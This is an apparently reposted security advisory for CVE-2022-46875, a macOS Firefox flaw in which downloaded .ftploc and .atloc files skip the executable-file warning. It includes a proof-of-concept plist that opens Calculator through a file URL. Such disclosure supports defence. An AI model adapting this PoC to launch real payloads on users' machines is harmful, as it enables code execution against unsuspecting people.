[0-Day] CVE-2022-46875 - Mozilla Firefox Download Protection Bypass Vulnerability

Mozilla Firefox

Original Write up : SSD ADVISORY – MACOS MOZILLA FIREFOX DOWNLOAD PROTECTIONS WERE BYPASSED

Summary

• A vulnerability in Mozilla Firefox has been found to not show an executable file warning when downloading .atloc and .ftploc files, which can run commands on a user’s computer.

Credit

• Dohyun Lee, working for SSD Labs Korea.

CVE

• CVE-2022-46875

Vendor Response

• The vendor has released patches available at: https://www.mozilla.org/en-US/security/advisories/mfsa2022-51/

Technical Analysis

• A vulnerability in the way Mozilla Firefox handles certain file extensions allows attackers to bypass the warning given for dangerous files and make them seem harmless.
• The protection triggers on .interloc but fails to do the same for .ftploc and .atloc, two extensions that on macOS are equivalent to executables.

PoC

• poc.ftploc

  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
  <key>URL</key>
  <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
  </dict>
  </plist>

Demo